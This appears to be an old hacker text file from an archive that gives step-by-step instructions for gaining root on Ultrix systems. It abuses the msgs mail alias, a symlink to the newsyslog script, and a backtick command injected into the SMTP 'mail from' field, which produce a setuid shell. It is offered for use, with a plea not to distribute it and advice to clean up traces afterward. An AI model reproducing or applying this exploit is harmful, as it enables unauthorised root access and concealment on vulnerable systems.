home *** CD-ROM | disk | FTP | other *** search
-
-
-
-
- DO NOT DISTRIBUTE THIS F***ING BUG. It works on Ultrix, and is one of the
-
- few Ultrix bugs I have seen that still works. It might work on other
-
- platforms too.
-
-
-
- This bug has been fixed in OSF, but not in Ultrix.
-
- It should also work on any system that has the msgs mail alias.
-
-
-
- $ grep msgs /etc/aliases
-
- msgs: "|/usr/ucb/msgs -s"
-
-
-
- Ok, the first thing to do is look in the /usr/msgs directory (or whatever
-
- the directory is where the msgs files are kept), and see what the next msgs
-
- file will be (if there is 1 and 2, then the next one is pretty easy to figure
-
- out).
-
-
-
- Then, make an executable /tmp/a that like makes an suid shell (this is pretty
-
- easy to do, if you can't do it, don't consider yourself a hacker).
-
-
-
- By default, newsyslog executes every 6 days at 4 am, but it depends on the
-
- setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1,
-
- .2, ..., i think).
-
-
-
- symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog
-
-
-
- $ telnet
-
- telnet> o localhost 25
-
- mail shit, version, etc
-
- expn msgs
-
- 250 <"| /usr/ucb/msgs -s">
-
- mail from: <`/tmp/a`>
-
- rcpt to: msgs
-
- data
-
- doesn't matter what you put here
-
- .
-
- quit
-
-
-
- So now, when it writes to /usr/msgs/<nextmsg>, it will overwrite
-
- /usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will
-
- expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or
-
- whatever /tmp/a does.
-
-
-
- From there, just clean up after yourself.
-
-
